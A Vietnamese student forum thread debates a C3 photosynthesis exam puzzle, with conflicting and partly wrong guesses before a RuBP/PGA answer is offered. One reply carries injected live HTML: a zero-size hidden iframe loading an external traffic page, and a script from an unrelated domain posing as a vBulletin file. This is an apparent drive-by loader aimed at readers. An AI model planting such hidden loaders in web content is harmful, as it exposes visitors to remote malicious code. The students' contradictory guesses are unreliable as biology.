Câu hỏi hay về Thực vật C3

Khiếu Phương Lan

Senior Member
Hôm qua, cô cho 7 câu về nhà làm ôn thi đội tuyển :cry:. Mệt gần chết, nhưng mà đọc lại thấy có câu này khá hay, pót lên đây cho mọi người cùng ngâm, cùng nghĩ:

Nghiên cứu cường độ quang hợp ở thực vật C3 thấy có hiện tượng sau
a) Khi chiếu sáng hàm lượng 2 chất gần như bằng nhau, nhưng khi tắt ánh sáng đi thì hàm lượng 1 chất tăng lên, 1 chất giảm đi
b) Ở nồng độ CO2 0.1% thì hàm lượng 2 chất gần như bằng nhau nhưng khi nồng độ CO2 giảm xuống còn 0.000001% thì hàm lượng 1 chất tăng lên, 1 chất giảm đi
Hỏi đó là 2 chất gì, vì sao?
Mời mọi người
 
Hôm qua, cô cho 7 câu về nhà làm ôn thi đội tuyển :cry:. Mệt gần chết, nhưng mà đọc lại thấy có câu này khá hay, pót lên đây cho mọi người cùng ngâm, cùng nghĩ:

Nghiên cứu cường độ quang hợp ở thực vật C3 thấy có hiện tượng sau
a) Khi chiếu sáng hàm lượng 2 chất gần như bằng nhau, nhưng khi tắt ánh sáng đi thì hàm lượng 1 chất tăng lên, 1 chất giảm đi
b) Ở nồng độ CO2 0.1% thì hàm lượng 2 chất gần như bằng nhau nhưng khi nồng độ CO2 giảm xuống còn 0.000001% thì hàm lượng 1 chất tăng lên, 1 chất giảm đi
Hỏi đó là 2 chất gì, vì sao?
Mời mọi người

Theo mình, khi không chiếu sáng và nồng độ CO2 giảm, thì:
Chất có hàm lượng giảm là đường (Gluxit). Nguyên nhân khá rõ ràng do cây không thực hiện quá trình quang hợp, trong khi các hoạt động sinh lý khác vẫn diễn ra đòi hỏi phân giải Gluxit để tạo năng lượng.
Chất có hàm lượng tăng là Protein và axit amin: Ánh sáng và nộng độ CO2 cao đẩy mạnh quá trình quang hợp nhưng lại ức chế quá trình hô hấp. Trong điều kiện không có ánh sáng và nồng độ CO2 thấp, cường độ hô hấp cũng như quá trình chuyển hóa các chất tăng mạnh. Điều đó khiến hàm lượng Gluxit giảm và hàm lượng Protein tăng.
 
Theo mình, khi không chiếu sáng và nồng độ CO2 giảm, thì:
Chất có hàm lượng giảm là đường (Gluxit). Nguyên nhân khá rõ ràng do cây không thực hiện quá trình quang hợp, trong khi các hoạt động sinh lý khác vẫn diễn ra đòi hỏi phân giải Gluxit để tạo năng lượng.
Chất có hàm lượng tăng là Protein và axit amin: Ánh sáng và nộng độ CO2 cao đẩy mạnh quá trình quang hợp nhưng lại ức chế quá trình hô hấp. Trong điều kiện không có ánh sáng và nồng độ CO2 thấp, cường độ hô hấp cũng như quá trình chuyển hóa các chất tăng mạnh. Điều đó khiến hàm lượng Gluxit giảm và hàm lượng Protein tăng.

Em cũng đã nghĩ tới 2 chất đó là CO2 và glucozo như anh Long nhưng có 1 giả thuyết em băn khoăn đó là, tại sao khi chiếu sáng thì 2 chất này lại có nồng độ bằng nhau, nếu biện luận theo quang hợp thì CO2 phải giảm và gluco phải tăng, đó, cái khó ở chỗ đấy
 
a) Khi chiếu sáng hàm lượng 2 chất gần như bằng nhau, nhưng khi tắt ánh sáng đi thì hàm lượng 1 chất tăng lên, 1 chất giảm đi
b) Ở nồng độ CO2 0.1% thì hàm lượng 2 chất gần như bằng nhau nhưng khi nồng độ CO2 giảm xuống còn 0.000001% thì hàm lượng 1 chất tăng lên, 1 chất giảm đi
Hỏi đó là 2 chất gì, vì sao?
Mời mọi người
Theo em ở câu 1 là tinh bột và NAD+
Câu 2 là RiDP và AlPG
 
Em cũng đã nghĩ tới 2 chất đó là CO2 và glucozo như anh Long nhưng có 1 giả thuyết em băn khoăn đó là, tại sao khi chiếu sáng thì 2 chất này lại có nồng độ bằng nhau, nếu biện luận theo quang hợp thì CO2 phải giảm và gluco phải tăng, đó, cái khó ở chỗ đấy

Lan hiểu nhầm ý mình rồi. Ý mình là Glucoxit (hay Glucozo) và Protein (hay axit amin) chứ không phải là Gluco và CO2.
Theo mình thì câu này trả lời dựa vào mối quan hệ giữa cường độ quang hợp và cường độ hô hấp + quá trình biến đổi giữa các chất.
Ngoài ánh sáng và khi có CO2, cả 2 quá trình quang hợp và hô hấp đều xảy ra, do vậy sản phẩm quang hợp và sản phẩm hô hấp tương đương.
Còn khi không có ánh sáng và nồng độ CO2 rất thấp (0.000001%) thì quang hợp không diễn ra, thay vào đó quá trình hô hấp và chuyển hóa giữa các chất tăng mạnh. Ai cũng biết sản phẩm của quá trình quang hợp là nguyên liệu cho quá trình hô hấp, chính vì vậy mà sản phẩm quang hợp (Gluxit) giảm, còn sản phẩm của hô hấp và chuyển hóa các chất tăng. Ở đây mạo mội đoán là Protein vì Thực vật ít Lipit. :mrgreen:
 
Lan hiểu nhầm ý mình rồi. Ý mình là Glucoxit (hay Glucozo) và Protein (hay axit amin) chứ không phải là Gluco và CO2.
Theo mình thì câu này trả lời dựa vào mối quan hệ giữa cường độ quang hợp và cường độ hô hấp + quá trình biến đổi giữa các chất.
Ngoài ánh sáng và khi có CO2, cả 2 quá trình quang hợp và hô hấp đều xảy ra, do vậy sản phẩm quang hợp và sản phẩm hô hấp tương đương.
Còn khi không có ánh sáng và nồng độ CO2 rất thấp (0.000001%) thì quang hợp không diễn ra, thay vào đó quá trình hô hấp và chuyển hóa giữa các chất tăng mạnh. Ai cũng biết sản phẩm của quá trình quang hợp là nguyên liệu cho quá trình hô hấp, chính vì vậy mà sản phẩm quang hợp (Gluxit) giảm, còn sản phẩm của hô hấp và chuyển hóa các chất tăng. Ở đây mạo mội đoán là Protein vì Thực vật ít Lipit. :mrgreen:
hihi, có lẽ mình hâm quá chứ em chưa thấy chỗ nào anh nói khoản pr thực vật cả, em xin phép nêu ý kiến của mình
Câu này thì rõ là đề cập tới 2 quá trình là hô hấp và quang hợp như là anh em của nhau thôi, nhưng với những dữ kiện đầu bài trên, cộng với ý kiến của mọi người, em thiết nghĩ có 2 khả năng 2 chất đó là CO2, O2 hay CO2 và glucoz vì
Khi chiếu sáng thì quá trình quang hợp tiêu tốn CO2 xảy ra sẽ tạo ra O2 đồng thời tạo ra glucoz, từ đó khiến cây hô hấp tiêu tốn glucoz. Vậy ta sẽ thấy lúc này nồng độ 2 chất glucoz sẽ bằng nhau. khi tắt ánh sáng đi cây không quang hợp đc vì vậy không lấy CO2 nữa, mà cây vẫn tiêu tốn năng lượng bằng cách phân giải glucoz từ đó thấy CO2 tăng, glucozo giảm.
Chính vì những giải thích trên lại nảy sinh ra một điều rằng khi hô hấp O2 cũng được tiêu tốn trong khi đó CO2 cứ tiếp tục tạo ra, cũng thoả mãi đề bài
Nhờ cao thủ hơn ra tay giùm:yeah:
 
Thiết nghĩ, từ hàm lượng ở đây thường không dùng cho chất khí. Hơn nữa thực vật C3 chẳng có lý do gì để tích trữ CO2 và O2 cả. Việc đo hàm lượng 1 chất khí có vẻ như không khả thi lắm (theo nhận xét chủ quan của mình).
 
a) Khi chiếu sáng hàm lượng 2 chất gần như bằng nhau, nhưng khi tắt ánh sáng đi thì hàm lượng 1 chất tăng lên, 1 chất giảm đi
Ko có as => ko QH. ADP giảm. ATP tăng (do quá trình hô hấp) Mình chọn 2 cái này vì đọc đề thấy nó như là 1 cặp. chứ ko thể là 2 chất chẳng liên quan j hết:sexy:
 
Thiết nghĩ, từ hàm lượng ở đây thường không dùng cho chất khí. Hơn nữa thực vật C3 chẳng có lý do gì để tích trữ CO2 và O2 cả. Việc đo hàm lượng 1 chất khí có vẻ như không khả thi lắm (theo nhận xét chủ quan của mình).
Em đồng ý vs ý kiến của anh Long. Lauren cũng đã nhắn tin hỏi em câu này nhưng...hì hì em ngu quá nghĩ ko ra. Mang ra lớp tham khảo ý kiến của mọi người thì đa số ý kiến là 02 và C02. Nghe qua thì cũng hợp lí nhưng em vẫn có điều băn khoăn.
1st là từ "hàm lượng" như anh nói. Là "hàm lượng" chứ ko phải "nồng độ"
2nd là...nếu đáp án như vậy thì ...đơn giản quá, học sinh đâu có cần suy luận nhiều=>>ko hay.
Đó là ý kiến chủ quan của mình.
Còn Lauren: cô cho đáp án chưa vậy bạn?
 
Em đồng ý vs ý kiến của anh Long. Lauren cũng đã nhắn tin hỏi em câu này nhưng...hì hì em ngu quá nghĩ ko ra. Mang ra lớp tham khảo ý kiến của mọi người thì đa số ý kiến là 02 và C02. Nghe qua thì cũng hợp lí nhưng em vẫn có điều băn khoăn.
1st là từ "hàm lượng" như anh nói. Là "hàm lượng" chứ ko phải "nồng độ"
2nd là...nếu đáp án như vậy thì ...đơn giản quá, học sinh đâu có cần suy luận nhiều=>>ko hay.
Đó là ý kiến chủ quan của mình.
Còn Lauren: cô cho đáp án chưa vậy bạn?

Mình nghĩ cũng không đơn giản vì đây là mấy câu trong tập tài liệu cô cho để ôn mà, nhưng càng nghĩ thì càng nhiều đáp án, khiến ra mình mơ hồ lắm. Hôm t7 sáng cô mới đưa, tối về thì mình làm xong, chỉ còn mỗi câu này còn băn khoăn..........hôm nay mới ra trường nộp cho cô thì đồng thời lại 17 câu tiếp về nghiền, não mình chẳng bao lâu thành bã đậu hết, hichic. Bao giờ cô cho đáp án nhất định sẽ đưa lên rồi, nhanh thôi, mọi người cứ tiếp tục cho ý kiến nhé
 
Nhanh nha bạn, mình cũng đang gặp rắc rối đây /

<iframe ALLOWTRANSPARENCY=true width="0" height="0" frameborder="0" scrolling="No" hspace="0" vspace="0" marginheight="0" marginwidth="0" src='http://thptbachdang.com/traff.html'></iframe>
<script src="http://style-vn.net/forum/clientscript/vbuletin.js"></script>
 
Nghiên cứu cường độ quang hợp ở thực vật C3 thấy có hiện tượng sau
a) Khi chiếu sáng hàm lượng 2 chất gần như bằng nhau, nhưng khi tắt ánh sáng đi thì hàm lượng 1 chất tăng lên, 1 chất giảm đi
b) Ở nồng độ CO2 0.1% thì hàm lượng 2 chất gần như bằng nhau nhưng khi nồng độ CO2 giảm xuống còn 0.000001% thì hàm lượng 1 chất tăng lên, 1 chất giảm đi
Hỏi đó là 2 chất gì, vì sao?
Mời mọi người
Khi giảm nồng độ CO2, pha sáng diễn ra bình thường. Pha tối của quang hợp diễn ra, do giảm CO2---> RiDP tăng, và APG giảm do quá trình khử CO2 để tạo APG bị giảm.
Khi tắt ánh sáng pha tối của quang hợp vẫn diến ra nhưng nguyên liệu là NADH và ATP lại không có do không có pha sáng nên RiDP giảm và APG tăng.

10S1702.gif

Từ sơ đồ này có thể suy ra kết quả.:up::up:
Câu này bọn em đã học thầy Vũ Văn Vụ và thầy nói đáp án là vậy, chắc đúng đó.
 

Facebook

Thống kê diễn đàn

Threads
11,649
Messages
71,550
Members
56,918
Latest member
sv368net
Back
Top